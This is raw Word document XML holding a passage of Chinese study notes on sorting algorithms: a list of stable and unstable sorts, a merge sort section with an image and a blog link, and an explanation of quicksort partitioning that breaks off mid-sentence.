    <w:p w:rsidR="00DF5302" w:rsidRPr="00086263" w:rsidRDefault="00DF5302" w:rsidP="009A5BB6">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:after="125" w:line="244" w:lineRule="atLeast"/>
        <w:ind w:firstLine="250"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009316E5" w:rsidRPr="00F93262" w:rsidRDefault="009316E5" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E91CF3" w:rsidRPr="00F41A4C" w:rsidRDefault="003C158E" w:rsidP="003C158E">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r w:rsidR="00A809AE" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>基础</w:t>
      </w:r>
      <w:r w:rsidR="00E91CF3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>算法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E91CF3" w:rsidRPr="00F41A4C" w:rsidRDefault="00E91CF3" w:rsidP="00D14F41">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">2.1  </w:t>
      </w:r>
      <w:r w:rsidR="00C04752" w:rsidRPr="00F41A4C">
        <w:t>排序算法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003676FD" w:rsidRPr="00F41A4C" w:rsidRDefault="003676FD" w:rsidP="003676FD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8306"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005640DB" w:rsidRPr="00F41A4C" w:rsidRDefault="00C04752" w:rsidP="00A34E3B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>稳定</w:t>
      </w:r>
      <w:r w:rsidR="005640DB" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="005640DB" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="1Char"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005640DB" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>冒泡排序、插入排序、归并排序和基数排序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A34E3B" w:rsidRPr="00F41A4C" w:rsidRDefault="00C04752" w:rsidP="00A34E3B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>非稳定</w:t>
      </w:r>
      <w:r w:rsidR="005640DB" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="005640DB" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="1Char"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005640DB" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="005640DB" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>选择排序、快速排序、希尔排序、堆排序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD09D9" w:rsidRDefault="00DD09D9" w:rsidP="00D14F41">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>归并排序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00797854" w:rsidRDefault="00017780" w:rsidP="00797854">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3118904"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="263"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96" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3118904"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D2710" w:rsidRPr="00797854" w:rsidRDefault="008D2710" w:rsidP="00797854">
      <w:r w:rsidRPr="008D2710">
        <w:t>http://blog.csdn.net/initphp/article/details/49493229</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E75B5" w:rsidRDefault="007E75B5" w:rsidP="00D14F41">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>快速排序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="00195466">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="393939"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="393939"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>快速排序采用的思想是分治思想。快速排序是找出一个元素（理论上可以随便找一个）作为基准</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="393939"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(pivot),</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="393939"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>然后对数组进行分区操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="393939"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="393939"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>使基准左边元素的值都不大于基准值</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="393939"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="393939"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>基准右边的元素值</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="393939"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="393939"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>都不小于基准值，如此作为基准的元素调整到排序后的正确位置。递归快速排序，将其他</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="393939"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>n-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="393939"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>个元素也调整到排序后的正确位置。最后每个元素都是在排序后的正</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="393939"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="393939"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>确位置，排序完成。所以快速排序算法的核心算法是分区操作，即如何调整基准的位置以及调整返回基准的最终位置以便分治递归。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="00195466">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>快速排序</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的基本思想是，通过一轮的排序将序列分割成独立的两部分，其中一部分序列的关键字（这里主要用值来表示）均比另一部分关键字小。继续对长度较短的序列进行同样的分割，最后到达整体有序。在排序过程中，由于已经分开的两部分的元素不需要进行比较，故减少了比较次数，降低了排序时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="00195466">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　详细描述：首先在要排序的序列</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中选取一个中轴值，而后将序列分成两个部分，其中左边的部分</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> b </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中的元素均小于或者等于</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中轴值，右边的部分</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> c </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的元素</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>均大于或者等于中轴值，而后通过递归调用快速排序的过程分别对两个部分进行排序，最后将两部分产生的结果合并即可得到最后的排序序列。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="00195466">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>基准值</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的选择有很多种方法。最简单的是使用第一个记录的关键字值。但是如果输入的数组是正序或者逆序的，就会将所有的记录分到</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>基准值</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的一边。较好的方法是随机选取</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>基准值</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，这样可以减少原始输入对排序造成的影响。但是随机选取</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>基准值</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的开销大。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007216CF" w:rsidRPr="00195466" w:rsidRDefault="007216CF" w:rsidP="00195466">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">　　为了实现一次划分，我们可以从数组（假定数据是存在数组中）的两端移动下标，必要时交换记录，直到数组两端的下标相遇为止。为此，我们附设两个指针（下角标）</w:t>
      </w:r>
      <w:r w:rsidRPr="00195466">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4B4B4B"/>
          <w:sz w:val="18"/>
